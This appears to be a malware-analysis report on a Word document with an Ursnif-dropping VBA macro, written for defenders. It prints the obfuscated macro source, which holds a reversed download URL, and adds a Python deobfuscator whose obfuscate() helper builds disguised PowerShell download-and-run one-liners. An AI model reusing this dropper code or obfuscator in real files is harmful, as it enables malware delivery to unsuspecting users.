Risk Score: 222 (MALICIOUS)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
This document carries a VBA macro whose Document_open handler runs as soon as the document is opened with macros enabled and executes a command through the Windows command shell (Shell ..., vbHide). The command string is assembled at run time from dozens of short literals, Chr() arithmetic for the few bytes that would otherwise be searchable (the "c", "C" and double-quote characters), and caret (^) characters that cmd.exe's parser discards; the modules are padded with junk Month() calls whose type errors are swallowed by On Error Resume Next, and the Shell line also sums several names (JlvBhD, zIREXRAawiP, ...) that are not defined in the extracted modules and so contribute nothing. The resulting one-liner is cmd /V:/C"set wL73=...&&for /L %Y in (263;-1;0) do set 5cZU=!5cZU!!wL73:~%Y,1!&& if %Y==0 call %5cZU:~6%", which rebuilds a stored string back to front with a delayed-expansion for /L loop and CALLs the result. Read backwards, the stored fragments contain the tokens powershell, new-object, Net.WebClient, DownloadFile, $env:public, '.exe', http:// and Invoke-Item, i.e. a PowerShell downloader that fetches an executable and runs it. The ClamAV detection as Doc.Downloader.URSNIF further supports this: the document is a dropper for a second-stage Ursnif (Gozi) payload rather than the payload itself.
Heuristics (6)
- ClamAV: Doc.Downloader.URSNIF-6729855-3 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3.
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: the document contains VBA macro code (see the extracted macros.bas below).
- Shell() call in VBA [critical, OLE_VBA_SHELL]: the Document_open handler passes a run-time-built string to Shell with vbHide, so the spawned cmd.exe window is never shown to the user.
- Document_Open macro [high, OLE_VBA_DOCOPEN]: a Document_Open procedure (here spelled Document_open; VBA is case-insensitive) runs automatically when the document is opened with macros enabled. Together with the Shell() call above it is the execution trigger.
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info, EMBEDDED_URL]: one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace present in any document with drawing content; it is not contacted at run time and is not the downloader's URL, which is stored reversed inside the macro strings.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4001 bytes | 731a3f146231af94da4af8538095699a550715c33dc28582af8beae866a84ab0 |

Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "czDYKwjdbUXnG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Shell Format(JlvBhD) + zIREXRAawiP + ARLjmGvuBdzTjw + ltLmiCR + rRihKOjFFh + JtlRKTjiaQ + BiLllbITjUuzX, vbHide
End Sub
Attribute VB_Name = "wfUloUYFmoi"
Function ltLmiCR()
On _
Error _
Resume _
Next
Month "5305" + "wlu"
tHiZzHjDXYi = Chr(9 + 4 + 15 + 2 + 69) + "md /V^" + ":/" + Chr(6 + 2 + 10 + 1 + 48) + Chr(2 + 1 + 5 + 0 + 26) + "^s" + "^e" + "^t ^" + "w^L7" + "3= ^ ^" + " ^ "
Month "6433" + "lwBjqAXY"
Month "zGZc" + "pdK"
NQbrFRwrf = "^" + " ^" + " ^ " + " " + " ^ ^ ^ " + " ^ }^}{" + "h"
Month "OZTsDU" + "ZVOZVX" + "97828236" + "iZI"
Month "IJq" + "jdHQrI"
JMdGY = Chr(9 + 4 + 15 + 2 + 69) + "^" + "t^a" + Chr(9 + 4 + 15 + 2 + 69) + "}^;" + "k^a^erb" + "^;k^HJ^" + "$^ ^me^" + "tI-^" + "e^k" + "ovnI;)^" + "k^HJ$^" + " ^,Rr" + "^z" + "$(^el^" + "i^Fd^a"
Month "UM" + "Yinnf"
Month "HlXlCODPV" + "ZOWY"
ZEUiaw = "^oln" + "w^o" + "^D^." + Chr(6 + 2 + 10 + 1 + 48) + "aO" + "${^" + "y" + "r" + "t^{)^" + "G^Y^" + "f^$ n" + "i^ " + "Rr^z^$(" + "^h" + Chr(9 + 4 + 15 + 2 + 69) + "a" + "^erof^;"
Month "vE" + "QOiVAKqJrVh"
Month "4599" + "Jih"
qGjOHU = "'" + "^exe." + "'^+^iE" + "^i^$" + "^+^'^" + "\^" + "'^+"
Month "swqTKaob" + "G"
Month "289255800" + "Cn"
Month "512805565" + "442578194" + "YAHiwMpYYXqBz" + "cjqtT"
Month "uiG" + "zSwYrbFi" + "4502" + "GCls"
GavCciCtzTa = Chr(9 + 4 + 15 + 2 + 69) + "^i^l" + "^bup:" + "vn^e^$^" + "=kH^J^$" + ";'" + "^4" + "73^'^" + " =^ ^" + "i" + "E^i^$;)" + "'@'("
Month "63044804" + "UmnzIiJta" + "A" + "9221"
Month "298926267" + "L"
OjFJvtQGB = "^t" + "il^p^" + "S^.^'nk" + "t^.4^b^" + "k^o^=^" + "l^?" + "^p"
Month "3060" + "5150" + "r" + "317404383"
Month "f" + "R"
Month "835" + "52380609"
pqsBrqQisX = "^h^p.^t" + "o^k^sn" + "^a" + "p^o/" + "^T^TR"
Month "186668196" + "AzP"
Month "482327998" + "VFDqwq" + "piz" + "wpsE"
lfhBwVrr = "/m^o" + Chr(9 + 4 + 15 + 2 + 69) + ".^9^o^" + "p^bp" + "1q^ht^y" + "^9z" + "ru//:" + "pt" + "th^"
Month "MO" + "398473261" + "660" + "2992"
Month "z" + "oAs"
Month "EAIb" + "VFiwEMGc" + "509368888" + "iVdtSC"
Month "WoUsIwK" + "4666"
CLqvcAYtT = "'" + "=" + "GY^f" + "^" + "$;tnei" + "l" + Chr(6 + 2 + 10 + 1 + 48) + "b" + "^" + "e^" + "W.t^eN"
Month "5390" + "R"
Month "JGDoc" + "tVlWf" + "s" + "hjntTA"
Month "BI" + "SoE" + "w" + "9217"
AvcjAU = " ^t" + Chr(9 + 4 + 15 + 2 + 69) + "^e^j" + "^bo^-" + "wen^=" + Chr(6 + 2 + 10 + 1 + 48) + "a" + "O^$ ^" + "l^le^h" + "^" + "s" + "rew^o^p" + "&&^f"
ltLmiCR = tHiZzHjDXYi + NQbrFRwrf + JMdGY + ZEUiaw + qGjOHU + GavCciCtzTa + OjFJvtQGB + pqsBrqQisX + lfhBwVrr + CLqvcAYtT + AvcjAU
Month "WCEtKii" + "316121387" + "784" + "jQ"
Month "1419" + "hfbuwPjkE" + "Ncb" + "391547414"
Month "iRYl" + "1862"
End Function
Function rRihKOjFFh()
On _
Error _
Resume _
Next
Month "jlXi" + "rHI" + "6866" + "mCnw"
Month "Io" + "lI"
OzfAVBsw = "^or" + " /^L " + "%^Y" + " ^" + "in" + " (^2^63" + "^;-^" + "1^;0)^d" + "^o ^s" + "^et" + " ^5" + Chr(9 + 4 + 15 + 2 + 69) + "^Z^U=!" + "^5" + Chr(9 + 4 + 15 + 2 + 69) + "^Z^U"
Month "7363" + "p"
Month "zwqY" + "5602" + "1597" + "231638475"
Month "ZNA" + "9276" + "oj" + "Nk"
rTjGTlrWqa = "!!^w^" + "L73:" + "~%" + "^Y" + ",1!&&^" + "if" + " %^" + "Y=" + "^=^0 " + Chr(9 + 4 + 15 + 2 + 69) + "^"
Month "Ms" + "lBF" + "HYMLEjiVJRt" + "350128085"
fhtuTLbqf = "a^" + "l^l " + "%" + "^5" + Chr(9 + 4 + 15 + 2 + 69) + "^Z^U" + ":^~6%" + Chr(2 + 1 + 5 + 0 + 26) + " " + ""
rRihKOjFFh = OzfAVBsw + rTjGTlrWqa + fhtuTLbqf
Month "YfLA" + "402569339"
Month "VQli" + "uqXvkqht"
Month "oMvP" + "ILBjFf"
Month "9453" + "340053906"
End Function
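The three obfuscation layers visible in the extracted macro (VBA string building with Chr() arithmetic, caret-split cmd.exe tokens, and a delayed-expansion for /L loop that copies a stored string back to front and CALLs it minus its first few characters) can be undone without a VBA interpreter. The Python below is an added example written for this page; it is not analyzer code and not code from the sample. It evaluates the macro's string-building expression, strips carets the way cmd.exe's parser does, and replays the reversal loop. The payload it round-trips (PAYLOAD, with the URL example.invalid and the junk prefix RrZzKk) is a constructed stand-in: the page does not disclose the sample's decoded command and this script makes no claim about it. The function names, the obfuscate() helper and the regular expressions are the author's own assumptions about the pattern, written from the fragments shown above.

```python
"""Replay the three obfuscation layers seen in the extracted macro.

Constructed example for this report; not analyzer code and not the sample's
decoded payload.  Layer 1: VBA builds strings from literals and Chr(a+b+c).
Layer 2: cmd.exe carets (^) split keywords; the parser drops them.  Layer 3:
a delayed-expansion `for /L` loop copies a stored string back to front and
CALLs the result minus its first few characters.
"""
import re

# Layer 1: "lit" + Chr(9 + 4 + 15 + 2 + 69) + "lit" ...  A literal-only
# evaluator is enough here; no VBA interpreter is needed.
_TOKEN = re.compile(r'"([^"]*)"|Chr\(([\d\s+]+)\)')


def eval_vba_concat(expr: str) -> str:
    """Concatenate the string literals and Chr(<int sum>) calls in a VBA expression."""
    parts = []
    for literal, chr_arg in _TOKEN.findall(expr):
        if chr_arg:
            parts.append(chr(sum(int(n) for n in chr_arg.split("+"))))
        else:
            parts.append(literal)
    return "".join(parts)


# Layer 2: cmd.exe's parser turns "^x" into "x" (so "^^" becomes "^") before
# the command runs, which is why the carets never reach cmd's `set`.
def strip_carets(s: str) -> str:
    out, i = [], 0
    while i < len(s):
        if s[i] == "^" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


# Layer 3: set SRC=<reversed>&&for /L %Y in (N;-1;0)do set ACC=!ACC!!SRC:~%Y,1!
#          &&if %Y==0 call %ACC:~SKIP%
# `!SRC:~%Y,1!` yields one character (or nothing past the end), so ACC ends up
# as SRC reversed; CALL re-expands %ACC:~SKIP%, dropping SKIP junk characters.
_LOOP = re.compile(
    r"set (?P<src>\w+)=(?P<val>.*?)&&\s*for /L %(?P<i>\w) in \((?P<n>\d+);-1;0\)\s*"
    r"do set (?P<acc>\w+)=!(?P=acc)!!(?P=src):~%(?P=i),1!&&\s*"
    r"if %(?P=i)==0 call %(?P=acc):~(?P<skip>\d+)%"
)


def simulate_reverse_loop(cmd: str) -> str:
    """Return what the loop's final CALL would execute."""
    m = _LOOP.search(cmd)
    if m is None:
        raise ValueError("no set/for-L reversal pattern found")
    val, n, skip = m["val"], int(m["n"]), int(m["skip"])
    acc = "".join(val[y] for y in range(n, -1, -1) if y < len(val))
    return acc[skip:]


def deobfuscate(cmdline: str) -> str:
    """Layers 2 and 3 applied to the string that Shell() would receive."""
    return simulate_reverse_loop(strip_carets(cmdline))


# Constructed stand-in payload (hypothetical URL); NOT the sample's real command.
PAYLOAD = ("powershell -nop -w hidden iex ((new-object Net.WebClient)"
           ".DownloadString('http://example.invalid/s2'))")


def obfuscate(payload: str, src: str = "wL73", acc: str = "5cZU", junk: str = "RrZzKk") -> str:
    """Build a one-liner in the sample's style so the decoder can be exercised offline."""
    # cmd metacharacters in the value would need their own escaping; the sample avoids them.
    assert not set(payload) & set('^&|<>"!%'), "payload uses a cmd metacharacter"
    value = payload[::-1] + junk            # junk lands at the front after reversal
    body = (f"set {src}={value}&&for /L %Y in ({len(value) - 1};-1;0)do set "
            f"{acc}=!{acc}!!{src}:~%Y,1!&&if %Y==0 call %{acc}:~{len(junk)}%")
    # Caret every second letter/digit/punctuation character, as the sample does.
    safe = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.:/-=;'()~,")
    carets = "".join("^" + ch if (ch in safe and k % 2) else ch for k, ch in enumerate(body))
    return 'cmd /V:/C"' + carets + '"'


if __name__ == "__main__":
    # The page's own first fragment: Chr() arithmetic hides the "c", "C" and '"' bytes.
    prefix = eval_vba_concat('Chr(9 + 4 + 15 + 2 + 69) + "md /V^" + ":/" '
                             '+ Chr(6 + 2 + 10 + 1 + 48) + Chr(2 + 1 + 5 + 0 + 26)')
    print(prefix, "->", strip_carets(prefix))
    line = obfuscate(PAYLOAD)
    print(line)
    print(deobfuscate(line))
```

On a real sample, feed deobfuscate() the string that olevba shows being passed to Shell after evaluating each contributing function with eval_vba_concat; the loop bound (263 here) and the :~6 skip are read from the command itself, so the decoder does not need to know them in advance. Anything the decoder returns is still untrusted data: the recovered URL belongs in a sandbox or a blocklist, not in a browser.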